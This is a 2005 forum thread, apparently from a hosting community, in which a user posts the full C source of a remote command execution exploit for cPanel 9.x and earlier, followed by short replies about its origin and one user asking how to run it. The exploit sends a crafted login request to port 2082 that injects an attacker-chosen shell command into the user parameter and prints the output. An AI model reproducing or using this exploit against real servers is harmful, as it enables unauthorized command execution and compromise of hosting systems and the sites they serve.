[exploit] Cpanel Versions Below And Equal To 9x

[sunny 0]

Exploit for cPanel versions below and equal to 9x that takes advantage of a remote command execution vulnerability.

/*cPanel <= 9x Remote Command Execution*///headers#include <stdio.h>//In/Out#include <winsock2.h>//sockets functions#include <stdlib.h>//memory functions#include <string.h>//strlen,strcat,strcpy#pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"#define Port 2082 //port for connect to cPanel#define SIZE 1024 //buffer size to receive the data/*connect host:port*/SOCKET Conecta(char *Host, short puerto){	/*struct for make the socket*/	WSADATA wsaData;	SOCKET Winsock;//listener socket	/*two structures for connect*/	struct sockaddr_in Winsock_In;	struct hostent *Ip;	/*start the socket*/	WSAStartup(MAKEWORD(2,2), &wsaData);	/*make*/	Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);		//check socket status	if(Winsock==INVALID_SOCKET)	{		/*exit*/		WSACleanup();		return -1;	}	/*complete the struct*/	Ip=gethostbyname(Host);	Winsock_In.sin_port=htons(puerto);	Winsock_In.sin_family=AF_INET;	Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));	/*connect*/	if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)	{		/*end*/		WSACleanup();		return -1;	}	return Winsock;}/*MASTER FUNCTION*/int main(int argc, char *argv[]){	/*the socket*/	SOCKET sock;	/*make the evil buffer to send the request*/	char evil_request[]="GET /login/?user=|%22%60";	char evil_request2[]="%60%22\r";	char *evil;	/*to receive the data*/	char buf[SIZE];	printf("\n+[ cPanel <= 9x Remote Command Execution ]+ by Lympex");    printf("\n");	printf("\n-----------------------------------------------------\n");	if(argc!=3)//cPanel_9x_rce.exe <host> <command>	{		printf("\n[+] Usage: %s <host> <command>\n",argv[0]);		return 0;	}	printf("\n[+] Connecting  %s:%d...",argv[1],Port);	/*start the exploit*/	sock=Conecta(argv[1],Port);//connect	if(sock==-1)	{		printf("Error\n");		return 1;	}	printf("OK");	/*make the EVIL request*/	evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));	strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n");	//sends it	send(sock,evil,strlen(evil),0);	buf[recv(sock,buf,SIZE,0)]='\0';	//show the data	printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);	WSACleanup();	LocalFree(buf);	LocalFree(evil);	return 0;}

[thablkpanda 0]

Interesting, where'd you find this, a reputable source or did you hack it yourself? Panda

[nelimitat 0]

That's really curious if he hacked the cpanel by himself. Really appreciate

Notice from wassie:

Deleted double post

Edited September 2, 2005 by wassie (see edit history)

[Saint_Michael 3]

interesting indeed but i don't think we could fix that ourselves since this is free hosting. but still interesting that you found this.

[sunny 0]

I have found it on some security portal. It is interresting to know that our faithful cPanel has some vulnerabilities.One more thing. While I was experimenting with the code, I found out that the server is secure if it is using an updated version of cPanel. And in Xisto's case I am sure that we are secure :-)

[Saint_Michael 3]

well with all the hosting account that span 3 websites i think it would have to secure.

[Nileshpatel 0]

Hello Sunny,Can you give step to use this code for Cpanel?Thanks nilesh

[X-Zone 0]

Hello Sunny,

 

Can you give step to use this code for Cpanel?

 

Thanks

nilesh

191633[/snapback]

It's C++ , i would imagine you compile then execute it